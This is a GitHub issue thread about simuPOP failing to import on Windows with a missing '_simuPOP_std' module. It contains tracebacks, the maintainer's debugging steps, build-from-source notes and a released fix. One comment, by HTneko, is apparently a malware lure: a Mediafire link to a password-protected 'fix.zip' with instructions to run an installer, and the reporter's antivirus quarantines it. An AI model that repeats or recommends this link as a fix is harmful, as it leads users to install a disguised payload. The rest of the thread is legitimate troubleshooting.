### ISSUE TITLE
ModuleNotFoundError when importing simupop: "No module named '_simuPOP_std'"

### ISSUE THREAD

**Issue by lfmcmillan** [BoPeng/simuPOP#122]
I just installed simuPOP on Windows 10 Pro 22H2 with Anaconda 3 using

conda install -c conda-forge simuPOP

which ran without any issues (and when I try to rerun it, it says "All requested packages already installed"). Then I tried to run a script that contained the single command

import simuPOP

and I got the following error:

Traceback (most recent call last):
  File "C:\ProgramData\miniconda3\Lib\site-packages\simuPOP\simuPOP_std.py", line 18, in swig_import_helper
    return importlib.import_module(mname)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\ProgramData\miniconda3\Lib\importlib\__init__.py", line 90, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "<frozen importlib._bootstrap>", line 1387, in _gcd_import
  File "<frozen importlib._bootstrap>", line 1360, in _find_and_load
  File "<frozen importlib._bootstrap>", line 1324, in _find_and_load_unlocked
ModuleNotFoundError: No module named 'simuPOP._simuPOP_std'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "C:\Users\LFM\Dropbox\Clustering\St_Andrews\simupop_import.py", line 1, in <module>
    import simuPOP
  File "C:\ProgramData\miniconda3\Lib\site-packages\simuPOP\__init__.py", line 323, in <module>
    from simuPOP.simuPOP_std import *
  File "C:\ProgramData\miniconda3\Lib\site-packages\simuPOP\simuPOP_std.py", line 21, in <module>
    _simuPOP_std = swig_import_helper()
                   ^^^^^^^^^^^^^^^^^^^^
  File "C:\ProgramData\miniconda3\Lib\site-packages\simuPOP\simuPOP_std.py", line 20, in swig_import_helper
    return importlib.import_module('_simuPOP_std')
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\ProgramData\miniconda3\Lib\importlib\__init__.py", line 90, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ModuleNotFoundError: No module named '_simuPOP_std'

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lfmcmillan** [comment]
I've downloaded that, and unzipped it with the password, and whenever I try to run it my antivirus software tries to move it to Quarantine even though I selected the option to Run it. I haven't got as far as the installer menu yet.

**Comment by BoPeng** [comment]
I am a bit suprised that you could actually install simuPOP under windows. Anyway, what is the content of `"C:\ProgramData\miniconda3\Lib\site-packages\simuPOP"`? Under windows, there should be a file named `_simuPOP_std.cp39-win_amd64.pyd` which should be located and loaded when running `import simuPOP`.

**Comment by lfmcmillan** [comment]
There's a file in that folder called `_simuPOP_std.cp37-win_amd64.pyd` but not one called `_simuPOP_std.cp39-win_amd64.pyd`

**Comment by BoPeng** [comment]
I am not really sure what is going on but you can change to that directory and try to import _simuPOP_std in a python session directly and check the error message. My guess is that you need to install some c++ redistributable library.

**Comment by lfmcmillan** [comment]
When I navigate into that folder and I try to import "simuPOP_std" I get this error message:

```
Traceback (most recent call last):
  File "C:\ProgramData\miniconda3\Lib\site-packages\simuPOP\simuPOP_std.py", line 18, in swig_import_helper
    return importlib.import_module(mname)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\ProgramData\miniconda3\Lib\importlib\__init__.py", line 90, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "<frozen importlib._bootstrap>", line 1387, in _gcd_import
  File "<frozen importlib._bootstrap>", line 1360, in _find_and_load
  File "<frozen importlib._bootstrap>", line 1324, in _find_and_load_unlocked
ModuleNotFoundError: No module named '_simuPOP_std'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "C:\ProgramData\miniconda3\Lib\site-packages\simuPOP\simupop_import.py", line 1, in <module>
    import simuPOP_std
  File "C:\ProgramData\miniconda3\Lib\site-packages\simuPOP\simuPOP_std.py", line 21, in <module>
    _simuPOP_std = swig_import_helper()
                   ^^^^^^^^^^^^^^^^^^^^
  File "C:\ProgramData\miniconda3\Lib\site-packages\simuPOP\simuPOP_std.py", line 20, in swig_import_helper
    return importlib.import_module('_simuPOP_std')
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\ProgramData\miniconda3\Lib\importlib\__init__.py", line 90, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ModuleNotFoundError: No module named '_simuPOP_std'
```

and when I try "import _simuPOP_std" I get this error message:

```
(base) C:\ProgramData\miniconda3\Lib\site-packages\simuPOP>python simupop_import.py
Traceback (most recent call last):
  File "C:\ProgramData\miniconda3\Lib\site-packages\simuPOP\simupop_import.py", line 1, in <module>
    import _simuPOP_std
ModuleNotFoundError: No module named '_simuPOP_std'
```

**Comment by lfmcmillan** [comment]
There is a file called "simuPOP_std.py" in that folder, but not one called "_simuPOP_std.py", if that makes any difference.

**Comment by BoPeng** [comment]
I was suggesting that you try to load the `.pyd file directly because of potential [dependency error](https://stackoverflow.com/questions/5667556/pyd-file-fails-to-load-but-dependancywalker-comes-up-clean-and-procmon-shows). 

Maybe the best approach is to use another platform, or use the linux subsystem of windows.

**Comment by lfmcmillan** [comment]
How do I load the `.pyd` file directly? Is it just a matter of using `import _simuPOP_std`?

**Comment by BoPeng** [comment]
I have not touched any windows machine for years so I could only guess you may have the wrong python version (cp37 or cp39), platform (amd64) or miss some vc library. The stack overflow question shows some way to debug.

**Comment by lfmcmillan** [comment]
I see. Do you mean that since I'm running Python 3.12 I need cp312 so I
should rebuild simuPOP from source instead?

(I already build R packages with RCpp on this computer, so I have C++
already)

Thanks

**Comment by lfmcmillan** [comment]
I tried cloning simuPOP onto my computer and installing it from source via pip, and it got partway but then fell over with the following error:

```
simuPOP\src\utility.h(520): error C2061: syntax error: identifier 'ssize_t'
```

**Comment by BoPeng** [comment]
Yes, you need zlib to install from source.

https://github.com/conda-forge/simupop-feedstock/blob/main/recipe/meta.yaml has a bit more information on dependencies, but the fact that [this PR](https://github.com/conda-forge/simupop-feedstock/pull/32) did not compile successfully on conda was not encouraging.

The problem with `ssize_t` is more troublesome, which means either your compiler is not supported, or the windows configuration file (which were generated by exploring capacity of compilers) needs to be adjusted.

**Comment by BoPeng** [comment]
Could you provide me with the exact version of windows (windows 10? windows server?), Python (original or third-party), environment (plain or conda), compiler (version of vc++ or gcc)? I might be able to find a windows VM and try to compile simuPOP there but last time I checked I need a paid license for VC++.

**Comment by BoPeng** [comment]
If you have vc installed, maybe you have the dumpbin utility and can use it to debug the problem as described at https://stackoverflow.com/questions/20201868/importerror-dll-load-failed-the-specified-module-could-not-be-found

**Comment by BoPeng** [comment]
OK, I found a windows 10 vm, and

1. installed the latest anaconda 
2. installed vs 2022 community version which seems to be the only free version
3. run
```
conda create --name simuPOP
conda install -c conda-forge vs2022_win-64 zlib
git clone https://github.com/BoPeng/simuPOP
cd simuPOP
python setup.py install
```

The error message for missing `zlib.h` is strange because the file is under `envs\simuPOP\Library\include`

**Comment by BoPeng** [comment]
@lfmcmillan please check out the latest master branch, compile from source, and let me know if it works.

**Comment by lfmcmillan** [comment]
@BoPeng yes! That worked! the latest branch successfully compiled from source, installed and worked with the updated scripts :D Thank you so much

**Comment by BoPeng** [comment]
I have released simuPOP 1.1.15 with the fix. However, unless I (or someone who has more time/expertise) can fix #103 , people would still need to compile simuPOP from source.
